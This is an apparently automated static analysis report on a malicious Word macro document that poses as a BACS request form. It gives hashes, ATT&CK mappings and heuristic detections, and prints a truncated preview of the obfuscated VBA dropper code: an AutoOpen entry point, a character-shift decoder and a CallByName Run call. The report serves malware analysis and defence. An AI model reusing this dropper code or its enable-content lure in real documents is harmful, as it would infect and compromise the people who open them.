Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cd59ec785e1d367a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 81.0 KB
Created: 2018-04-05 09:46:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: fa9762828cf25f0182cc5a6781e708da
SHA-1: ba7d988fa3e44133ec65c2cc0d3741efab82b762
SHA-256: cd59ec785e1d367a1c45aa7bf1e092e1f014153722641a76fef14d700ad7ed06
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Word document containing VBA macros. The document body presents a fake 'INCOMING BACS REQUEST FORM' and instructs the user to 'ENABLE EDITING and then ENABLE CONTENT' to auto-fill the form, a common social engineering lure. The extracted VBA source 'macros.bas' contains an 'AutOOpen' subroutine (VBA identifiers are case-insensitive, so this is the standard AutoOpen auto-execute entry point) and uses the 'CreateObject' and 'CallByName' functions, both indicative of malicious intent. The script attempts to establish persistence by writing to the registry Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy, most likely so that a second-stage payload is downloaded and executed.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-6496095-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6496095-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call [high] OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://onlinebusiness.lloydsbank.co.uk/wps/wcm/connect/content_lloyds_business_banking/assets/media/images/lloydstsb2009/miscellaneous/logo-.png (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7897 bytes
SHA-256: 16ee43bd3d5dd6f7dd09afb8690fd6e94240c7f9e0c67e3d521e7fea11c45638

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
soartone
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
End Sub


Attribute VB_Name = "borobelH"
Function tommyandy()
tommyandy = undeaddos.goldlulu
End Function

Sub elvismac(vokhserehS)
nbf = "Run"
nbf0 = 0
nbf1 = True
CallByName vokhserehS, nbf, VbMethod, loganone.nissanhawk, nbf0, nbf1
End Sub

Function JULY1951(shorenap, spriteicq)
JULY1951 = Mid(shorenap, spriteicq, 1)
End Function

Function february1247(HCIVOTULP, inTenDo22, parker4444, volifartS)
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
loganone.nissanhawk = jasminlulu(HCIVOTULP, inTenDo22) + lomevein(HCIVOTULP, parker4444) + vonlebaT(volifartS)
End Function

Function iinnayrezO(wharfgur As String, meobench As Integer) As String
Dim bulltopher As Integer
bulltopher = 0
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
For LTVFUJUB = 1 To 90
If (JULY1951(tommyandy, LTVFUJUB) = wharfgur) Then
   bulltopher = LTVFUJUB
   tellbron = 76 + 120
tellbron = 32 + 8
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
    Exit For
End If
Next LTVFUJUB
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
bulltopher = IIf(bulltopher - meobench <= 0, 90 + bulltopher - meobench, bulltopher - meobench)
iinnayrezO = JULY1951(tommyandy, bulltopher)
End Function

Function whales600()
whales600 = ram72603.heagueur
End Function

Function beaner2001()
beaner2001 = loganone.ohkhfozA
End Function

Function dogtoothdogtooth()
dogtoothdogtooth = "m;]Qgm;]/u/ayEmaQRcasglaiuhEs/l"
End Function

Function perry192()
perry192 = "]/oui.g/nEmaE]jRcasglaiuhEs/l"
End Function

Function lomevein(gathbill, AVOFATDAN)
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
lomevein = petevision(ram72603.missdrin) + AVOFATDAN + petevision(ram72603.leicht01) + _
AVOFATDAN + petevision(ram72603.jennamec) + gathbill + _
petevision(ram72603.cephheug + perry192 + ram72603.maico500) + gathbill + petevision(ram72603.cephheug)
End Function


Attribute VB_Name = "chiterochek"
Function deutschne()
deutschne = undeaddos.raygaitp
End Function

Function mqundwxb()
mqundwxb = loganone.alemeltp
End Function

Sub soartone()
Randomize
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
undeaddos.reenrasta = "Mnfubdlc"
End Sub

Function petevision(prototnv)
Itfktljg = ""
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
foobarnat = Len(prototnv)
For ANIHINAPORT = 1 To foobarnat
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
Itfktljg = Itfktljg + iinnayrezO(JULY1951(prototnv, ANIHINAPORT), 4)
Next ANIHINAPORT
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
petevision = Itfktljg
End Function

Function jasminlulu(prabordw, dosfreddy)
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron =
... (truncated)